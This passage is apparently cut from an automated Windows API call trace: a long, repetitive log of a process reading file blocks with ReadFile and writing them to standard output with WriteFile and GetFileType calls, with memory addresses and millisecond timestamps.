lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.620] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] GetFileType (hFile=0x4c) returned 0x1 [0098.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.621] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.621] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.622] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.623] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.624] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.625] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.626] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, 